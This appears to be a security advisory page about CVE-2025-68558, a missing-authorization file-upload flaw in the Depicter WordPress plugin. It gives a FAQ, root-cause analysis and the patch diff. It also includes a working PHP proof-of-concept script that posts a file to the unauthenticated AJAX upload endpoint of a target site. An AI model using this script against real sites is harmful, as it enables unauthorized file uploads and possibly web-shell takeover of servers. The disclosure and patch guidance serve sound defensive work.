What is CVE-2025-68558?

CVE-2025-68558 is a medium severity vulnerability in the Depicter plugin for WordPress, specifically versions up to and including 4.0.4. It is caused by a missing authorization check that allows unauthenticated users to perform unauthorized actions, such as file uploads.

How does the vulnerability work?

The vulnerability exists in the `uploadFile` method of the `FileUploaderController` class, which lacks a capability check. An attacker can exploit this by sending a crafted POST request to the `admin-ajax.php` endpoint, allowing them to upload files without authentication.

Who is affected by this vulnerability?

Any WordPress site using the Depicter plugin version 4.0.4 or earlier is affected by this vulnerability. Administrators can check their plugin version in the WordPress admin dashboard under the ‘Plugins’ section.

How can I fix or mitigate this issue?

To fix this vulnerability, update the Depicter plugin to version 4.0.5 or later, which includes the necessary authorization checks. Regularly updating plugins is a best practice to maintain security.

What does the CVSS score of 5.3 indicate?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while it is not the most critical type of vulnerability, it still poses a significant risk that should be addressed promptly.

What risks are associated with this vulnerability?

If exploited, this vulnerability allows an attacker to upload arbitrary files to the server, which could lead to remote code execution or denial of service. This compromises the integrity of the site’s media library and may exhaust server resources.

What is the proof of concept for this vulnerability?

The proof of concept provided demonstrates how an attacker can use a crafted POST request to upload a file to the vulnerable endpoint. It shows the necessary parameters and the use of cURL to execute the attack.

What is the role of the `current_user_can` check?

The `current_user_can(‘upload_files’)` check is added in the patched version to ensure that only users with the appropriate permissions can upload files. This prevents unauthorized access to the file upload functionality.

How can I ensure my site remains secure after patching?

To maintain security, regularly update all WordPress plugins and themes, implement strong access controls, and monitor for unusual activity on your site. Consider using security plugins that provide additional protection.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the Depicter plugin to prevent exploitation until an update can be applied. Additionally, review server logs for any unauthorized access attempts.

Where can I find more information about CVE-2025-68558?

More information about CVE-2025-68558 can be found on the National Vulnerability Database or security advisory sites. These resources provide detailed analysis and recommendations regarding vulnerabilities.

What are the implications of unauthorized file uploads?

Unauthorized file uploads can lead to various security issues, including the execution of malicious scripts, data breaches, and service disruptions. It is crucial to address such vulnerabilities to protect user data and site integrity.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-68558: Depicter Slider <= 4.0.4 – Missing Authorization (depicter)

CVE ID CVE-2025-68558

Plugin depicter

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 4.0.4

Patched Version 4.0.5

Disclosed January 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68558:
The Depicter WordPress plugin, versions up to and including 4.0.4, contains a missing authorization vulnerability. This flaw allows unauthenticated attackers to perform unauthorized actions, specifically file uploads, due to insufficient capability checks on an AJAX endpoint.

The root cause is the absence of a capability check in the `uploadFile` method of the `FileUploaderController` class. The vulnerable function, located in `/depicter/app/src/Controllers/Ajax/FileUploaderController.php`, processes file uploads via an AJAX route. The code before the patch directly accessed the `$request->files()` array without verifying if the current user possesses the `upload_files` WordPress capability. This missing check allowed any user, including unauthenticated visitors, to trigger the file upload logic.

An attacker can exploit this by sending a crafted POST request to the WordPress `admin-ajax.php` endpoint. The request must specify the AJAX action `depicter/dashboard/ajax/upload/file`. The attacker includes file data in the request body, mimicking a legitimate file upload from the plugin’s editor interface. No authentication cookies or nonces are required for this request in the vulnerable versions.

The patch adds an authorization check at the beginning of the `uploadFile` method. The fix inserts a conditional statement that calls `current_user_can(‘upload_files’)`. If the check fails, the function returns a JSON error response with a 400 status code. The patch also adds CSRF middleware (`csrf-api:depicter-editor`) to several related AJAX routes in `/depicter/app/routes/ajax.php` to further harden the security of the rules management endpoints.

Successful exploitation allows an unauthenticated attacker to upload arbitrary files to the WordPress server. Depending on server configuration and file type restrictions, this could lead to remote code execution by uploading a web shell, or to a denial of service by exhausting disk space. It also violates the integrity of the site’s media library.

Differential between vulnerable and patched code

Code Diff

--- a/depicter/app/routes/ajax.php
+++ b/depicter/app/routes/ajax.php
@@ -471,18 +471,22 @@
 // ========================================================
 Depicter::route()->methods(['POST'])
     ->where('ajax', 'depicter-document-rules-store', true, true)
+    ->middleware('csrf-api:depicter-editor')
     ->handle('RulesAjaxController@store');

 Depicter::route()->methods(['GET'])
         ->where('ajax', 'depicter-document-rules-show', true, true)
+        ->middleware('csrf-api:depicter-editor')
         ->handle('RulesAjaxController@show');

 Depicter::route()->methods(['GET'])
         ->where('ajax', 'depicter-condition-all', true, true)
+        ->middleware('csrf-api:depicter-editor')
         ->handle('RulesAjaxController@all');

 Depicter::route()->methods(['GET'])
         ->where('ajax', 'depicter-document-condition-options', true, true)
+        ->middleware('csrf-api:depicter-editor')
         ->handle('RulesAjaxController@conditionValues');

 Depicter::route()->methods(['POST'])
--- a/depicter/app/src/Controllers/Ajax/FileUploaderController.php
+++ b/depicter/app/src/Controllers/Ajax/FileUploaderController.php
@@ -8,6 +8,13 @@
 	public function uploadFile(RequestInterface $request, $view) {

 		try{
+
+			if ( ! current_user_can('upload_files') ) {
+				return Depicter::json([
+					'errors' => [ __('You do not have permission to upload files.', 'depicter' ) ]
+				])->withStatus(400 );
+			}
+
 			$files = $request->files();

 			if ( empty( $files ) ) {
--- a/depicter/depicter.php
+++ b/depicter/depicter.php
@@ -3,7 +3,7 @@
  * Plugin Name: Depicter
  * Plugin URI: https://depicter.com
  * Description: Build stunning sliders, popups, carousels, video sliders, post sliders, and WooCommerce sliders fast and easy.
- * Version: 4.0.4
+ * Version: 4.0.5
  * Requires at least: 5.3
  * Requires PHP: 7.4.0
  * Author: Depicter Slider and Popup by Averta
@@ -17,7 +17,7 @@
  * @package Depicter
  */

-const DEPICTER_VERSION = '4.0.4';
+const DEPICTER_VERSION = '4.0.5';

 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
--- a/depicter/vendor/autoload.php
+++ b/depicter/vendor/autoload.php
@@ -14,10 +14,7 @@
             echo $err;
         }
     }
-    trigger_error(
-        $err,
-        E_USER_ERROR
-    );
+    throw new RuntimeException($err);
 }

 require_once __DIR__ . '/composer/autoload_real.php';
--- a/depicter/vendor/composer/InstalledVersions.php
+++ b/depicter/vendor/composer/InstalledVersions.php
@@ -27,6 +27,12 @@
 class InstalledVersions
 {
     /**
+     * @var string|null if set (by reflection by Composer), this should be set to the path where this class is being copied to
+     * @internal
+     */
+    private static $selfDir = null;
+
+    /**
      * @var mixed[]|null
      * @psalm-var array{root: array{name: string, pretty_version: string, version: string, reference: string|null, type: string, install_path: string, aliases: string[], dev: bool}, versions: array<string, array{pretty_version?: string, version?: string, reference?: string|null, type?: string, install_path?: string, aliases?: string[], dev_requirement: bool, replaced?: string[], provided?: string[]}>}|array{}|null
      */
@@ -323,6 +329,18 @@
     }

     /**
+     * @return string
+     */
+    private static function getSelfDir()
+    {
+        if (self::$selfDir === null) {
+            self::$selfDir = strtr(__DIR__, '\', '/');
+        }
+
+        return self::$selfDir;
+    }
+
+    /**
      * @return array[]
      * @psalm-return list<array{root: array{name: string, pretty_version: string, version: string, reference: string|null, type: string, install_path: string, aliases: string[], dev: bool}, versions: array<string, array{pretty_version?: string, version?: string, reference?: string|null, type?: string, install_path?: string, aliases?: string[], dev_requirement: bool, replaced?: string[], provided?: string[]}>}>
      */
@@ -336,7 +354,7 @@
         $copiedLocalDir = false;

         if (self::$canGetVendors) {
-            $selfDir = strtr(__DIR__, '\', '/');
+            $selfDir = self::getSelfDir();
             foreach (ClassLoader::getRegisteredLoaders() as $vendorDir => $loader) {
                 $vendorDir = strtr($vendorDir, '\', '/');
                 if (isset(self::$installedByVendor[$vendorDir])) {
--- a/depicter/vendor/composer/platform_check.php
+++ b/depicter/vendor/composer/platform_check.php
@@ -19,8 +19,7 @@
             echo 'Composer detected issues in your platform:' . PHP_EOL.PHP_EOL . str_replace('You are running '.PHP_VERSION.'.', '', implode(PHP_EOL, $issues)) . PHP_EOL.PHP_EOL;
         }
     }
-    trigger_error(
-        'Composer detected issues in your platform: ' . implode(' ', $issues),
-        E_USER_ERROR
+    throw new RuntimeException(
+        'Composer detected issues in your platform: ' . implode(' ', $issues)
     );
 }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68558 - Depicter Slider <= 4.0.4 - Missing Authorization

<?php

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';

// The vulnerable AJAX action for file upload.
$action = 'depicter/dashboard/ajax/upload/file';

// Path to a test file to upload.
$file_path = '/tmp/test.jpg';

// Prepare the POST data with the action parameter.
$post_fields = [
    'action' => $action
];

// Prepare the file for upload using CURLFile.
if (file_exists($file_path) && is_readable($file_path)) {
    $cfile = new CURLFile($file_path, 'image/jpeg', 'test.jpg');
    $post_fields['file'] = $cfile;
} else {
    die("Test file not found or not readable: $file_pathn");
}

// Initialize cURL session.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

// Execute the request.
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Analyze the response.
echo "HTTP Status Code: $http_coden";
echo "Response Body: $responsen";

// Check for success indicators.
if ($http_code == 200 && strpos($response, '"errors"') === false) {
    echo "n[+] The target appears vulnerable. File upload may have succeeded.n";
} else {
    echo "n[-] The target may be patched or the request failed.n";
}

?>

Frequently Asked Questions

What is CVE-2025-68558?
Overview of the vulnerability
CVE-2025-68558 is a medium severity vulnerability in the Depicter plugin for WordPress, specifically versions up to and including 4.0.4. It is caused by a missing authorization check that allows unauthenticated users to perform unauthorized actions, such as file uploads.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the `uploadFile` method of the `FileUploaderController` class, which lacks a capability check. An attacker can exploit this by sending a crafted POST request to the `admin-ajax.php` endpoint, allowing them to upload files without authentication.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Depicter plugin version 4.0.4 or earlier is affected by this vulnerability. Administrators can check their plugin version in the WordPress admin dashboard under the ‘Plugins’ section.
How can I fix or mitigate this issue?
Updating the plugin
To fix this vulnerability, update the Depicter plugin to version 4.0.5 or later, which includes the necessary authorization checks. Regularly updating plugins is a best practice to maintain security.
What does the CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while it is not the most critical type of vulnerability, it still poses a significant risk that should be addressed promptly.
What risks are associated with this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability allows an attacker to upload arbitrary files to the server, which could lead to remote code execution or denial of service. This compromises the integrity of the site’s media library and may exhaust server resources.
What is the proof of concept for this vulnerability?
Demonstration of exploitation
The proof of concept provided demonstrates how an attacker can use a crafted POST request to upload a file to the vulnerable endpoint. It shows the necessary parameters and the use of cURL to execute the attack.
What is the role of the `current_user_can` check?
Authorization mechanism
The `current_user_can(‘upload_files’)` check is added in the patched version to ensure that only users with the appropriate permissions can upload files. This prevents unauthorized access to the file upload functionality.
How can I ensure my site remains secure after patching?
Ongoing security practices
To maintain security, regularly update all WordPress plugins and themes, implement strong access controls, and monitor for unusual activity on your site. Consider using security plugins that provide additional protection.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the Depicter plugin to prevent exploitation until an update can be applied. Additionally, review server logs for any unauthorized access attempts.
Where can I find more information about CVE-2025-68558?
Resources for further reading
More information about CVE-2025-68558 can be found on the National Vulnerability Database or security advisory sites. These resources provide detailed analysis and recommendations regarding vulnerabilities.
What are the implications of unauthorized file uploads?
Understanding the impact
Unauthorized file uploads can lead to various security issues, including the execution of malicious scripts, data breaches, and service disruptions. It is crucial to address such vulnerabilities to protect user data and site integrity.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations